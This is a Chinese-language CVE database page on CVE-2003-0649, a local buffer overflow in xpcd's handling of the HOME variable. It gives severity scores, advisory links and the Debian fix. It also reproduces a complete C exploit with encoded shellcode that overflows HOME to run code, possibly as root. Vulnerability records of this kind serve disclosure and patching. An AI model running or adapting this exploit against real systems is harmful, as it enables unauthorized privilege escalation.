CVE-2003-0649
CVSS7.2
发布时间 :2003-08-27 00:00:00
修订时间 :2008-09-10 15:20:02
NMCOES    

[原文]Buffer overflow in xpcd-svga for xpcd 2.08 and earlier allows local users to execute arbitrary code via a long HOME environment variable.


[CNNVD]XPCD HOME环境变量本地缓冲区溢出漏洞(CNNVD-200308-186)

        
        xpcd是一款Linux系统下的相片光盘工具。
        xpcd不正确处理HOME环境变量名,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以root用户权限在系统上执行任意指令。
        攻击者提供超长HOME环境变量值,执行xpcd的时候可触发缓冲区溢出,精心构建提交数据可能以root用户权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0649
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0649
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-186
(官方数据源) CNNVD

- 其它链接及资源

http://www.debian.org/security/2003/dsa-368
(VENDOR_ADVISORY)  DEBIAN  DSA-368
http://www.mandriva.com/security/advisories?name=MDKSA-2004:053
(UNKNOWN)  MANDRAKE  MDKSA-2004:053

- 漏洞信息

XPCD HOME环境变量本地缓冲区溢出漏洞
高危 边界条件错误
2003-08-27 00:00:00 2005-10-20 00:00:00
本地  
        
        xpcd是一款Linux系统下的相片光盘工具。
        xpcd不正确处理HOME环境变量名,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以root用户权限在系统上执行任意指令。
        攻击者提供超长HOME环境变量值,执行xpcd的时候可触发缓冲区溢出,精心构建提交数据可能以root用户权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Debian
        ------
        
        http://www.debian.org/security/2003/dsa-368

- 漏洞信息 (22996)

XPCD 2.0.8 Home Environment Variable Local Buffer Overflow Vulnerability (EDBID:22996)
linux local
2003-07-18 Verified
0 r-code
N/A [点击下载]
source: http://www.securityfocus.com/bid/8370/info

A problem in the handling of long strings in environment variables by xpcd may result in a buffer overflow condition. This may allow an attacker to gain unauthorized access to system resources.

/**************************************************************************** 
 * xpcd 2.0.8 [latest] exploit written by r-code [Elite FXP Team] * 
 * * 
 * Actually xpcd usually isn`t suid, therefore for most of you * 
 * this exploit will be useless, on the other hand, maybe on some * 
 * conditions someone sets +S (who knows... ;-) * 
 * * 
 * Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher * 
 * Flames to: ElSiLaSoF - fucking kiddie.. * 
  
****************************************************************************/ 


#include <stdio.h> 
#include <unistd.h> 
#include <stdlib.h> 


unsigned long int get_sp(void) { 
  __asm__("movl %esp,%eax"); 
} 


char shellcode[] = 


"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x60\x80\x36" 
"\x01\x46\xe2\xfa\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01" 
"\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\x83\x10" 
"\x01\x01\xc6\x44\xfd\x01\x01\x01\x01\x8c\xba\x63\xef\xfe\xfe\x88\x7c\xf9\xb9" 
"\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01" 
"\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x5a\x5f\x5e\xc8\xc2\x8c\x77\x01" 
"\x91\x91\x91\x91"; 



#define LEN 280 
#define DEFAULT_OFFSET 530 
#define PATH "/usr/local/bin/xpcd" 


int main(int argc,char **argv) { 
  register int i; 
  char *evilstr=0,*str=0,*e=0; 
  unsigned long int retaddr=0,offset=DEFAULT_OFFSET,*ptr=0; 
   
  printf("[=] xpcd0x01 exploit written by r-code d_fence(at)gmx(dot)net 
[ELITE FXP TEAM]\n"); 
  printf("[=] Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, 
Cypher\n"); 
  printf("[=] Flames to: ElSiLaSoF - fucking kiddie.\n\n"); 
   
   
  if(argc>1) 
    offset=atoi(argv[1]); 
   
  retaddr=get_sp() - offset; 
   
  printf("iNFO:) esp: 0x%x offset: 0x%x ret_addr: 
0x%x\n",get_sp(),offset,retaddr); 
  printf("iNFO:) If Doesn`t work, try with OFFSETS 400 - 600\n\n"); 
   
  evilstr=(char *)malloc(LEN); 
  e=(char *)malloc(LEN+10); 
  ptr=(unsigned long int *)evilstr; 
   
  for(i=0;i<(LEN);) { 
    evilstr[i++] = (retaddr & 0x000000ff); 
    evilstr[i++] = (retaddr & 0x0000ff00) >> 8; 
    evilstr[i++] = (retaddr & 0x00ff0000) >> 16; 
    evilstr[i++] = (retaddr & 0xff000000) >> 24; 
  } 
   
  memset(evilstr,'A',(LEN/2)); 
   
  for(i=0;i<strlen(shellcode);i++) 
    evilstr[(LEN/2)-(strlen(shellcode)/2)+i]=shellcode[i]; 
   
  evilstr[LEN]=0x00; 
  memcpy(e,"HOME=",5); 
  memcpy(e+5,evilstr,LEN); 
  putenv(e); 
  execl(PATH,"xpcd",NULL); 
   
} 

		

- 漏洞信息

6582
xpcd xpcd-svga HOME Variable Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A local overflow exists in xpcd. The xpcd fails to check the boundary of the HOME environment variable, resulting in a buffer overflow. By sending a long string to $Home, a local attacker can overflow the buffer and execute arbitrary code on the server with elevated privileges, resulting in a loss of integrity.

- 时间线

2003-06-18 Unknow
2003-06-18 Unknow

- 解决方案

Upgrade to version 2.08-8woody1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

XPCD Home Environment Variable Local Buffer Overflow Vulnerability
Boundary Condition Error 8370
No Yes
2003-06-18 12:00:00 2009-07-11 10:56:00
Discovery credited to r-code.

- 受影响的程序版本

xpcd xpcd 2.0 8
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0

- 漏洞讨论

A problem in the handling of long strings in environment variables by xpcd may result in a buffer overflow condition. This may allow an attacker to gain unauthorized access to system resources.

- 漏洞利用

Exploit contributed by r-code.

- 解决方案

Debian has released advisory DSA 368-1 to address this issue.


xpcd xpcd 2.0 8

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站